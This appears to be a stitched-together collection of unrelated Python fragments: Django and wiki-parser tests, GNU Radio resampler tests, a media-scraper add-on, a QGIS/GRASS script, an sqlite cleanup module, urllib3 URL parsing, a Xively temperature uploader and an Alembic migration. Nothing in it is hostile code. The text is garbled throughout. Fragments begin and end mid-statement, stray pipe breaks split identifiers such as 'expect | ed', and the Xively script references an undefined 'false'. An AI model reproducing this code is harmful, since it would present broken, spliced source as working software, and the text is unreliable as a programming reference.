self.assertRedirects(response, expected_url='/a | ccounts/login/?next=%s' % quote(self.url))
response = self.client.post(self.url)
self.assertRedirects(response, expected_url='/accounts/login/?next=%s' % quote(self.url))
def test_GET_with_hide_param_puts_list_of_only_unused_questions_in_context(self):
question1 = Question.objects.create(text='USed question', UID='C00033', answer_type='Number',
region=self.region)
question1.question_group.create(subsection=self.subsection)
hide_url = '/subsection/%d/assign_questions/?hide=1' % self.subsection.id
response = self.client.get(hide_url)
self.assertIn(question1, response.context['active_questions'])
self.assertNotIn(question1, response.context['questions'])
class UnAssignQuestionViewTest(BaseTest):
def setUp(self):
self.client = Client()
self.user = self.create_user(org="WHO")
self.assign('can_edit_questionnaire', self.user)
self.client.login(username=self.user.username, password='pass')
self.questionnaire = Questionnaire.objects.create(name="JRF 2013 Core English", year=2013, region=None)
self.section = Section.objects.create(name="section", questionnaire=self.questionnaire, order=1)
self.subsection = SubSection.objects.create(title="subsection 1", section=self.section, order=1)
self.question1 = Question.objects.create(text='Q1', UID='C00003', answer_type='Number', region=None)
self.question |
Invalid 1 == foo
==
Invalid 2 ==
== Invalid 3
==
==
Invalid 4
==
== Invalid | 5
foo ==
"""
expected = [
"Section with trailing spaces",
]
result = get_anchors(get_section_headings(snippet), pretty=True)
assert result == expect | ed
class test_ensure_flagged:
def test_add(self):
wikicode = mwparserfromhell.parse("[[foo]]")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]]{{bar}}"
def test_preserve(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{bar}}"
def test_strip_params(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar|baz}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{bar}}"
def test_replace_params(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar|baz}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar", "param1", "param2")
assert str(wikicode) == "[[foo]] {{bar|param1|param2}}"
def test_named_params(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar|baz}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "bar", "2=param1", "1=param2")
assert str(wikicode) == "[[foo]] {{bar|2=param1|1=param2}}"
def test_dead_link(self):
wikicode = mwparserfromhell.parse("[[foo]]{{Dead link|2000|01|01}}")
link = wikicode.nodes[0]
flag = ensure_flagged_by_template(wikicode, link, "Dead link", "2017", "2", "3", overwrite_parameters=False)
assert str(wikicode) == "[[foo]]{{Dead link|2000|01|01}}"
class test_ensure_unflagged:
def test_noop(self):
wikicode = mwparserfromhell.parse("[[foo]]")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]]"
def test_preserve(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{baz}}"
def test_remove(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]]"
def test_no_remove(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar")
assert str(wikicode) == "[[foo]] {{bar (Language)}}"
def test_match_only_prefix(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar", match_only_prefix=True)
assert str(wikicode) == "[[foo]]"
def test_match_only_prefix_no_remove(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz (Language)}}")
link = wikicode.nodes[0]
flag = ensure_unflagged_by_template(wikicode, link, "bar", match_only_prefix=True)
assert str(wikicode) == "[[foo]] {{baz (Language)}}"
class test_is_flagged:
def test_noop(self):
wikicode = mwparserfromhell.parse("[[foo]]")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is False
def test_false(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is False
def test_true(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is True
def test_false_exact_match(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar") is False
def test_match_only_prefix(self):
wikicode = mwparserfromhell.parse("[[foo]] {{bar (Language)}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar", match_only_prefix=True) is True
def test_match_only_prefix_false(self):
wikicode = mwparserfromhell.parse("[[foo]] {{baz (Language)}}")
link = wikicode.nodes[0]
assert is_flagged_by_template(wikicode, link, "bar", match_only_prefix=True) is False
class test_is_redirect:
redirects = [
# any number of spaces
"#redirect[[foo]]",
"#redirect [[foo]]",
"#redirect [[foo]]",
# optional colon
"#redirect: [[foo]]",
"#redirect :[[foo]]",
"#redirect : [[foo]]",
# any capitalization
"#reDiRect [[foo]]",
"#REDIRECT [[foo]]",
# leading whitespace
"\n \n #redirect [[foo]]",
# any section and alternative text (which is ignored)
"#redirect [[foo#section]]",
"#redirect [[foo#section|ignored]]",
# templates
# FIXME: probably not possible to pair '{{' and '}}' with a regex
# "#redirect [[{{echo|Foo}}bar]]",
]
nonredirects = [
"#redirect [[]]",
"#redirect [[]]",
"#redirect [[<nowikifoo]]",
"#redirect :: [[foo]]",
"#redirect [[foo{}]]",
]
def test_redirects(self):
for text in self.redirects:
assert is_redirect(text, full_match=False)
assert is_redirect(text, full_match=True)
text += "\n"
assert is_redirect(text, full_match=False)
assert is_redirect(text, full_match=True)
text += "bar"
assert is_redirect(text, full_match=False)
assert not is_redirect(text, full_match=True)
def test_nonredirects(self):
for text in self.redirects:
assert not is_redirect("foo" + text, full_match=False)
assert not is_redirect("foo" + text, full_match=True)
for text in self.nonredirects:
assert not is_redirect("foo" + text, full_match=False)
assert not is_redirect("foo" + text, full_match=True)
class test_parented_ifilter:
wikicode = mwparserfromhell.parse("""<span>
foo {{bar|some text and {{another|template}}}}
</span>
{{foo|bar}}
""")
def test_recursive(self):
nodes = []
for parent, node in parented_ifilter(self.wikicode,
recursive=True):
nodes.append(node)
assert parent.index(node) >= 0
assert nodes == self.wikicode.filter(recursive=True)
def test_nonrecursive(self):
nodes = []
for parent, node in parented_ifilter(self.wikicode,
recursive=False):
nodes.append(node)
assert parent.index(node) >= 0
assert nodes == self.wikicode.filter(recursive=False)
def test_recursive_templates(self):
templates = []
for parent, template in parented_ifilter(self.wikicode,
forcetype=mwparserfromhell.nodes.template.Template,
recursive=True):
templates.append(template)
assert parent.index(template) >= 0
assert templates == self.wikicode.filter_templates(recursive=True)
def test_nonrecursive_templates(self):
templates = []
for parent, template in parented_ifilter(self.wikicode,
forcetype=mwparserfromhell.nodes.template.Template,
recursive=False):
templates.append(template)
assert parent.index(template) >= 0
assert templates == self.wiki |
dio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from __future__ import print_function
from __future__ import division
from gnuradio import gr, gr_unittest, filter, blocks
import math
import random
import sys
def random_floats(n):
r = []
for x in range(n):
# r.append(float(random.randint(-32768, 32768)))
r.append(float(random.random()))
return tuple(r)
def reference_dec_filter(src_data, decim, taps):
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.fir_filter_fff(decim, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
result_data = dst.data()
tb = None
return result_data
def reference_interp_filter(src_data, interp, taps):
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.interp_fir_filter_fff(interp, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
result_data = dst.data()
tb = None
return result_data
def reference_interp_dec_filter(src_data, interp, decim, taps):
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
up = filter.interp_fir_filter_fff(interp, (1,))
dn = filter.fir_filter_fff(decim, taps)
dst = blocks.vector_sink_f()
tb.connect(src, up, dn, dst)
tb.run()
result_data = dst.data()
tb = None
return result_data
class test_rational_resampler (gr_unittest.TestCase):
def setUp(self):
random.seed(0)
def tearDown(self):
pass
def test_000_1_to_1(self):
taps = (-4, 5)
src_data = (234, -4, 23, -56, 45, 98, -23, -7)
xr = (1186, -112, 339, -460, -167, 582)
expected_result = tuple([float(x) for x in xr])
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(1, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_001_interp(self):
taps = [1, 10, 100, 1000, 10000]
src_data = (0, 2, 3, 5, 7, 11, 13, 17)
interpolation = 3
xr = (2,20,200,2003,20030,
300,3005,30050,
500,5007,50070,
700,7011,70110,
1100,11013,110130,
1300,13017,130170,
1700.0,17000.0,170000.0, 0.0)
expected_result = tuple([float(x) for x in xr])
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interpolation, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_002_interp(self):
taps = random_floats(31)
src_data = random_floats(10000)
interpolation = 3
expected_result = reference_interp_filter(src_data, interpolation, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interpolation, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
N = 1000
offset = len(taps)-1
self.assertEqual(expected_result[offset:offset+N], result_data[0:N])
def xtest_003_interp(self):
taps = random_floats(9)
src_data = random_floats(10000)
decimation = 3
expected_result = reference_dec_filter(src_data, decimation, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(1, decimation, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op)
tb.connect(op, dst)
tb.run()
result_data = dst.data()
N = 10
offset = 10#len(taps)-1
print(expected_result[100+offset:100+offset+N])
print(result_data[100:100+N])
#self.assertEqual(expected_result[offset:offset+N], result_data[0:N])
# FIXME disabled. Triggers hang on SuSE 10.0
def xtest_004_decim_random_vals(self):
MAX_TAPS = 9
MAX_DECIM = 7
OUTPUT_LEN = 9
random.seed(0) # we want reproducibility
for ntaps in range(1, MAX_TAPS + 1):
for decim in range(1, MAX_DECIM+1):
for ilen in range(ntaps + decim, ntaps + OUTPUT_LEN*decim):
src_data = random_floats(ilen)
taps = random_floats(ntaps)
expected_result = reference_dec_filter(src_data, decim, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(1, decim, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
tb = None
result_data = dst.data()
L1 = len(result_data)
L2 = len(expected_result)
L = min(L1, L2)
if False:
sys.stderr.write('delta = %2d: ntaps = %d decim = %d ilen = %d\n' % (L2 - L1, ntaps, decim, ilen))
sys.stderr.write(' len(result_data) = %d len(expected_result) = %d\n' %
(len(result_data), len(expected_result)))
self.assertEqual(expected_result[0:L], result_data[0:L])
# FIXME disabled. Triggers hang on SuSE 10.0
def xtest_005_interp_random_vals(self):
MAX_TAPS = 9
MAX_INTERP = 7
INPUT_LEN = 9
random.seed(0) # we want reproducibility
for ntaps in range(1, MAX_TAPS + 1):
for interp in range(1, MAX_INTERP+1):
for ilen in range(ntaps, ntaps + INPUT_LEN):
src_data = random_floats(ilen)
taps = random_floats(ntaps)
expected_result = reference_interp_filter(src_data, interp, taps)
tb = gr.top_block()
src = blocks.vector_source_f(src_data)
op = filter.rational_resampler_base_fff(interp, 1, taps)
dst = blocks.vector_sink_f()
tb.connect(src, op, dst)
tb.run()
tb = None
result_data = dst.data()
L1 = len(result_data)
L2 = len(expected_result)
| L = min(L1, L2)
#if True or abs(L1-L2) | > 1:
if False:
sys.stderr.write('delta = %2d: ntaps = %d interp = %d ilen = %d\n' % (L2 - L1, ntaps, interp, ilen))
#sys.stderr.write(' len(result_data) = %d len(expected_result) = %d\n' %
# (len(result_data), len(expected_result)))
#self.assertEqual(expected_result[0:L], result_data[0:L])
# FIXME check first ntaps+1 answers
self.assertEqual(expected_result[ntaps+1:L], result_data[ntaps+1:L])
def test_006_interp_decim(self):
taps = random_floats(31)
src_data = random_floats(10000)
interp = 3
decimation = 2
expected_result = reference_interp_dec_filter |
mpList = self.__loadLocal(cfg, lItem)
if tmpList and len(tmpList.rules) > 0:
successfullyScraped = self.__loadRemote(tmpList, lItem)
# autoselect
if tmpList and tmpList.skill.find('autoselect') != -1 and len(tmpList.items) == 1:
m = tmpList.items[0]
m_type = m['type']
if m_type == 'rss':
common.log('Autoselect - ' + m['title'])
lItem = m
tmpList = self.parse(lItem).list
if not tmpList:
return ParsingResult(ParsingResult.Code.CFGSYNTAX_INVALID, None)
if tmpList and successfullyScraped == False:
return ParsingResult(ParsingResult.Code.WEBREQUEST_FAILED, tmpList)
# Remove duplicates
if tmpList.skill.find('allowDuplicates') == -1:
urls = []
for i in range(len(tmpList.items)-1,-1,-1):
item = tmpList.items[i]
tmpUrl = item['url']
tmpCfg = item['cfg']
if not tmpCfg:
tmpCfg = ''
if not urls.__contains__(tmpUrl + '|' + tmpCfg):
urls.append(tmpUrl + '|' + tmpCfg)
else:
tmpList.items.remove(item)
return ParsingResult(ParsingResult.Code.SUCCESS, tmpList)
"""
loads cfg, creates list and sets up rules for scraping
"""
def __loadLocal(self, filename, lItem = None):
params = []
#get Parameters
if filename.find('@') != -1:
params = filename.split('@')
filename = params.pop(0)
# get cfg file
cfg = filename
if not os.path.exists(cfg):
cfg = os.path.join(common.Paths.modulesDir, filename)
if not os.path.exists(cfg):
tmpPath = os.path.dirname(os.path.join(common.Paths.modulesDir, lItem["definedIn"]))
cfg = os.path.join(tmpPath ,filename)
if not os.path.exists(cfg):
srchFilen | ame = filename
if filename.find('/') > -1:
srchFilename = srchFilename.split('/')[1]
| try:
cfg = findInSubdirectory(srchFilename, common.Paths.modulesDir)
except:
try:
cfg = findInSubdirectory(srchFilename, common.Paths.favouritesFolder)
except:
try:
cfg = findInSubdirectory(srchFilename, common.Paths.customModulesDir)
except:
common.log('File not found: ' + srchFilename)
return None
#load file and apply parameters
data = getFileContent(cfg)
data = cr.CustomReplacements().replace(os.path.dirname(cfg), data, lItem, params)
#log
msg = 'Local file ' + filename + ' opened'
if len(params) > 0:
msg += ' with Parameter(s): '
msg += ",".join(params)
common.log(msg)
outputList = self.__parseCfg(filename, data, lItem)
return outputList
"""
scrape items according to rules and add them to the list
"""
def __loadRemote(self, inputList, lItem):
try:
inputList.curr_url = lItem['url']
count = 0
i = 1
maxits = 2 # 1 optimistic + 1 demystified
ignoreCache = False
demystify = False
back = ''
startUrl = inputList.curr_url
#print inputList, lItem
while count == 0 and i <= maxits:
if i > 1:
ignoreCache = True
demystify = True
# Trivial: url is from known streamer
if back:
lItem['referer'] = back
items = self.__parseHtml(inputList.curr_url, '"' + inputList.curr_url + '"', inputList.rules, inputList.skill, inputList.cfg, lItem)
count = len(items)
# try to find items in html source code
if count == 0:
referer = ''
if lItem['referer']:
referer = lItem['referer']
data = common.getHTML(inputList.curr_url, None, referer, False, False, ignoreCache, demystify)
if data == '':
return False
msg = 'Remote URL ' + inputList.curr_url + ' opened'
if demystify:
msg += ' (demystified)'
common.log(msg)
if inputList.section != '':
section = inputList.section
data = self.__getSection(data, section)
if lItem['section']:
section = lItem['section']
data = self.__getSection(data, section)
items = self.__parseHtml(inputList.curr_url, data, inputList.rules, inputList.skill, inputList.cfg, lItem)
count = len(items)
common.log(' -> ' + str(count) + ' item(s) found')
# find rtmp stream
#common.log('Find rtmp stream')
if count == 0:
item = self.__findRTMP(data, startUrl, lItem)
if item:
items = []
items.append(item)
count = 1
# find embedding javascripts
#common.log('Find embedding javascripts')
if count == 0:
item = findJS(data)
if item:
firstJS = item[0]
streamId = firstJS[0]
jsUrl = firstJS[1]
if not jsUrl.startswith('http://'):
jsUrl = urllib.basejoin(startUrl,jsUrl)
streamerName = getHostName(jsUrl)
jsSource = getHTML(jsUrl, None, startUrl, True, False)
phpUrl = findPHP(jsSource, streamId)
if phpUrl:
data = getHTML(phpUrl, None, startUrl, True, True)
item = self.__findRTMP(data, phpUrl, lItem)
if item:
if streamerName:
item['title'] = item['title'].replace('RTMP', streamerName)
items = []
items.append(item)
count = 1
else:
red = phpUrl
common.log(' -> Redirect: ' + red)
if back == red:
break
back = inputList.curr_url
inputList.curr_url = red
common.log(str(len(inputList.items)) + ' items ' + inputList.cfg + ' -> ' + red)
startUrl = red
continue
# find redirects
#common.log('find redirects')
if count == 0:
red = self.__findRedirect(startUrl, inputList.curr_url)
if startUrl == red:
common.log(' -> No redirect found')
else:
common.log(' -> Redirect: ' + red)
if back == red:
break
back = inputList.curr_url
inputList.curr_url = red
common.log(str(len(inputList.items)) + ' items ' + inputList.cfg + ' -> ' + red)
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
r_mapcalc.py
------------
Date : February 2016
Copyright : (C) 2016 by Médéric Ribreux
Email : medspx at medspx dot fr
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__ | author__ = 'Médéric Ribreux'
__date__ = 'February 2016'
__copyright__ | = '(C) 2016, Médéric Ribreux'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
def checkParameterValuesBeforeExecuting(alg, parameters, context):
""" Verify if we have the right parameters """
if (alg.parameterAsString(parameters, 'expression', context)
and alg.parameterAsString(parameters, 'file', context)):
return False, alg.tr("You need to set either inline expression or a rules file!")
return True, None
def processInputs(alg, parameters, context, feedback):
# We will use the same raster names than in QGIS to name the rasters in GRASS
rasters = alg.parameterAsLayerList(parameters, 'maps', context)
for idx, raster in enumerate(rasters):
rasterName = os.path.splitext(
os.path.basename(raster.source()))[0]
alg.inputLayers.append(raster)
alg.setSessionProjectionFromLayer(raster)
command = 'r.in.gdal input="{0}" output="{1}" --overwrite -o'.format(
os.path.normpath(raster.source()),
rasterName)
alg.commands.append(command)
alg.removeParameter('maps')
alg.postInputs()
def processCommand(alg, parameters, context, feedback):
alg.processCommand(parameters, context, feedback, True)
def processOutputs(alg, parameters, context, feedback):
# We need to export every raster from the GRASSDB
alg.exportRasterLayersIntoDirectory('output_dir',
parameters, context,
wholeDB=True)
|
# -*-coding:UTF-8 -*
import sqlite3 as sql
import json
from time import time, strftime
import settings
import logging as lgn
lgn.basicConfig(filename = '/db/db.log',level=lgn.DEBUG,\
format='%(asctime)s %(message)s')
def logit(string,*level):
if(len(level) == 0):
lgn.info(string)
else:
if(level[0] == 10):
lgn.debug(string)
elif(level[0] == 20):
lgn.info(string)
elif(level[0] == 30):
lgn.warning(string)
elif(level[0] == 40):
lgn.error(string)
else:
lgn.critical(string)
def clean_listings():
conn,c = get_conn()
#first the easy thing: let's delete all the listings that are not
#linked to any search anymore
c.execute('''delete from listings where id not in
(select listingid from search_listings)''')
| conn.commit()
#now let's delete all the listings older than max age
max_age = time() - settings.n_days_before_del * 86400
c.execute('''delete from listings where date_added <= ?''',(max_age,))
conn.commit()
def get_conn():
conn = sql. | connect("/db/spider_nest.db")
c = conn.cursor()
c.execute('''PRAGMA foreign_keys = ON''')
return conn,c
def add_error_listings(site,conn,c):
siteid = c.execute('select id from websites where url = ?',(site,)).fetchone()
searches = c.execute('select id from searches where websiteid = ?',siteid).fetchall()
try:
c.execute('''insert into listings(websiteid,desc,webid,img,url,date_added) values(
?,'NO PLUGIN AVAILABLE','NA','NA','NA',?)''',(siteid[0],time()))
except sql.IntegrityError:
logit('tried to add a no plugin available listing for {} twice. Normal behaviour.'.format(site))
#nothing fancy here, we just tried to add a no plugin available listing
#twice, since it's already there our work here is done
return
listingid = c.execute('select id from listings where websiteid = ?',siteid).fetchone()
for s in searches:
c.execute('''insert into search_listings(searchid,listingid)
values(?,?)''',(s[0],listingid[0]))
conn.commit()
|
t is None:
return None
if self.port:
return f"{self.host}:{self.port}"
return self.host
@property
def url(self) -> str:
"""
Convert self into a url
This function should more or less round-trip with :func:`.parse_url`. The
returned url may not be exactly the same as the url inputted to
:func:`.parse_url`, but it should be equivalent by the RFC (e.g., urls
with a blank port will have : removed).
Example:
.. code-block:: python
import urllib3
U = urllib3.util.parse_url("https://google.com/mail/")
print(U.url)
# "https://google.com/mail/"
print( urllib3.util.Url("https", "username:password",
"host.com", 80, "/path", "query", "fragment"
).url
)
# "https://username:password@host.com:80/path?query#fragment"
"""
scheme, auth, host, port, path, query, fragment = self
url = ""
# We use "is not None" we want things to happen with empty strings (or 0 port)
if scheme is not None:
url += scheme + "://"
if auth is not None:
url += auth + "@"
if host is not None:
url += host
if port is not None:
url += ":" + str(port)
if path is not None:
url += path
if query is not None:
url += "?" + query
if fragment is not None:
url += "#" + fragment
return url
def __str__(self) -> str:
return self.url
@overload
def _encode_invalid_chars(
component: str, allowed_chars: Container[str]
) -> str: # Abstract
...
@overload
def _encode_invalid_chars(
component: None, allowed_chars: Container[str]
) -> None: # Abstract
...
def _encode_invalid_chars(
component: Optional[str], allowed_chars: Container[str]
) -> Optional[str]:
"""Percent-encodes a URI component without reapplying
onto an already percent-encoded component.
"""
if component is None:
return component
component = to_str(component)
# Normalize existing percent-encoded bytes.
# Try to see if the component we're encoding is already percent-encoded
# so we can skip all '%' characters but still encode all others.
component, percent_encodings = _PERCENT_RE.subn(
lambda match: match.group(0).upper(), component
)
uri_bytes = component.encode("utf-8", "surrogatepass")
is_percent_encoded = percent_encodings == uri_bytes.count(b"%")
encoded_component = bytearray()
for i in range(0, len(uri_bytes)):
# Will return a single character bytestring
byte = uri_bytes[i : i + 1]
byte_ord = ord(byte)
if (is_percent_encoded and byte == b"%") or (
byte_ord < 128 and byte.decode() in allowed_chars
):
encoded_component += byte
continue
encoded_component.extend(b"%" + (hex(byte_ord)[2:].encode().zfill(2).upper()))
return encoded_component.decode()
def _remove_path_dot_segments(path: str) -> str:
# See http://tools.ietf.org/html/rfc3986#section-5.2.4 for pseudo-code
segments = path.split("/") # Turn the path into a list of segments
output = [] # Initialize the variable to use to store output
for segment in segments:
# '.' is the current directory, so ignore it, it is superfluous
if segment == ".":
continue
# Anything other than '..', should be appended to the output
if segment != "..":
output.append(segment)
# In this case segment == '..', if we can, we should pop the last
# element
elif output:
output.pop()
# If the path starts with '/' and the output is empty or the first string
# is non-empty
if path.startswith("/") and (not output or output[0]):
output.insert(0, "")
# If the path starts with '/.' or '/..' ensure we add one more empty
# string to add a trailing '/'
if path.endswith(("/.", "/..")):
output.append("")
return "/".join(output)
def _normalize_host(host: Optional[str], scheme: Optional[str]) -> Optional[str]:
if host:
if scheme in _NORMALIZABLE_SCHEMES:
is_ipv6 = _IPV6_ADDRZ_RE.match(host)
if is_ipv6:
match = _ZONE_ID_RE.search(host)
if match:
start, end = match.span(1)
zone_id = host[start:end]
if zone_id.startswith("%25") and zone_id != "%25":
zone_id = zone_id[3:]
else:
zone_id = zone_id[1:]
zone_id = _encode_invalid_chars(zone_id, _UNRESERVED_CHARS)
return f"{host[:start].lower()}%{zone_id}{host[end:]}"
else:
return host.lower()
elif not _IPV4_RE.match(host):
return to_str(
b".".join([_idna_encode(label) for label in host.split(".")]),
"ascii",
)
return host
def _idna_encode(name: str) -> bytes:
if name and any([ord(x) > 128 for x in name]):
try:
import idna
except ImportError:
raise LocationParseError(
"Unable to parse URL without the 'idna' module"
) from None
try:
return idna.encode(name.lower(), strict=True, std3_rules=True)
except idna.IDNAError:
raise LocationParseError(
f"Name '{name}' is not a valid IDNA label"
) from None
return name.lower().encode("ascii")
def _encode_target(target: str) -> str:
"""Percent-encodes a request target so that there are no invalid characters
Pre-condition for this function is that 'target' must start with '/'.
If that is the case then _TARGET_RE will always produce a match.
"""
match = _TARGET_RE.match(target)
if not match: # Defensive:
raise LocationParseError(f"{target!r} is not a valid request URI")
path, query = match.groups()
encoded_target = _encode_invalid_chars(path, _PATH_CHARS)
if query is not None:
query = _encode_invalid_chars(query, _QUERY_CHARS)
encoded_target += "?" + query
return encoded_target
def parse_url(url: str) -> Url:
"""
Given a url, return a parsed :class:`.Url` namedtuple. Best-effort is
performed to parse incomplete urls. Fields not provided will be None.
This parser is RFC 3986 compliant.
The parser logic and helper functions are based heavily on
work done in the ``rfc3986`` module.
:param str url: URL to parse into a :class:`.Url` namedtuple.
Partly backwards-compatible with :mod:`urlparse`.
Example:
.. code-block:: python
import urllib3
print( urllib3.util.parse_url('http://google.com/mail/'))
# Url(scheme | ='http', host='google.com', port=None, path='/mail/', ...)
print( urllib3.util.parse_url('google.com:80'))
# Url(scheme=None, host='google.com', port=80, path=None, ...)
print( urllib3.util.parse_url('/foo?bar'))
# Url(scheme=None, host=None, port=None, path='/foo', query='bar', ...)
"""
if not url:
# Empty
return Url()
source_url = url
if not _SCHEME_RE.search(url):
url = "//" | + url
scheme: Optional[str]
authority: Optional[str]
auth: Optional[str]
host: Optional[str]
port: Optional[str]
port_int: Optional[int]
path: Optional[str]
query: Optional[str]
fragment: Optional[str]
try:
scheme, authority, path, query, fragment = _URI_RE.match(url).groups() # type: ignore[union-attr]
normalize_uri = scheme is None or scheme.lower() in _NORMALIZABLE_SCHEMES
if scheme:
scheme = scheme.lower()
if authority:
auth, _, host_port = authority.rpartition("@")
auth = auth or None
host, port = _HOST_PORT_RE.matc |
#!/usr/bin/env python
import argparse
import datetime
import os
import re
import requests
import subprocess
import sys
import time
import xively
DEBUG = os.environ["DEBUG"] or false
def read_temperature(from_file):
if DEBUG:
print "Reading temperature from file: %s" % from_file
temperature = None
with open(from_file, 'r') as f:
crc = f.readline()
reading = f.readline()
matches = re.search('t=(\d+)', reading)
if matches:
temperature = float(matches.group(1)) / 1000.0
return temperature
def get_datastream(feed, name):
try:
datastream = feed.datastreams.get(name)
if DEBUG:
print "Found existing datastream"
return datastream
except:
if DEBUG:
print "Creating new datastream"
datastream = feed.datastreams.create(name, tags="units=celsius")
return datastrea | m
def run():
parser = argparse.ArgumentParser(description = 'Push a metric to Xively')
parser.add_argument('--feed', type=str, required=True, help='your Xively feed ID')
parser.add_argument('--key', type=str, required=True, help='your Xively API key')
parser.add_argument('--name', type=str, default='temperature0', help='your Xively datast | ream name')
parser.add_argument('--file', type=str, required=True, help='the file from which to read the temperature')
args = parser.parse_args()
api = xively.XivelyAPIClient(args.key)
feed = api.feeds.get(args.feed)
datastream = get_datastream(feed, args.name)
datastream.max_value = None
datastream.min_value = None
while True:
temperature = read_temperature(args.file)
if DEBUG:
print "Updating Xively feed with value: %s" % temperature
datastream.current_value = temperature
datastream.at = datetime.datetime.utcnow()
try:
datastream.update()
except Exception as err:
sys.stderr.write('ERROR: %s\n' % str(err))
print "Updated Xively feed, sleeping..."
time.sleep(60)
run()
|
# Copyright 2015 CloudFounders NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Lice | nse is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language | governing permissions and
# limitations under the License.
"""
This package contains Linux OS distribution extensions
"""
|
"""db migration
Revision ID: 373a21295ab
Revises: 21f5b2d3905d
Create Date: 2015-05-05 15:42:33.474470
"""
# revision identifiers, used by Alembic.
revision = '373a21295ab'
down_revision = '21f5b2d3905d'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.drop_table('items')
items = op.create_table('items',
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('name', sa.String(255), nullable=False),
sa.Column('is_bought', sa.Boolean, default=False, nullable=False),
sa.Column('created', sa.DateTime, default=sa.func.now(),
nullable=False),
sa.Column('modified', sa.DateTime, default=sa.func.now(),
| onupdate=sa.func.now(), nullable=False))
def downgrade():
op.drop_table('items')
op.create_table('items',
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('name', sa.String(255), nullable=False),
sa.Column('is_bought', sa.Boolean, default=False, nullable=False),
sa.Column('modified', sa.DateTime, default=sa.func.now(),
onupdate=sa.func.now(), nullable=False),
sa.Column('created', sa.DateTime, default=s | a.func.now()))
|
from ..library.base import number_t | o_list
def solve(bound: int=100):
maximal = 0
for a in range(bound):
for b in range(bound):
sum_digits = sum(number_to_list(a ** b))
if sum_digits > maximal:
maximal = sum_digits
return maxima | l
|
# (C) Copyright 2011 Nuxeo SAS <http://nuxeo.com>
# Author: bdelbosc@nuxeo.com
#
# This program is free software; you can redistribute it and/or modify
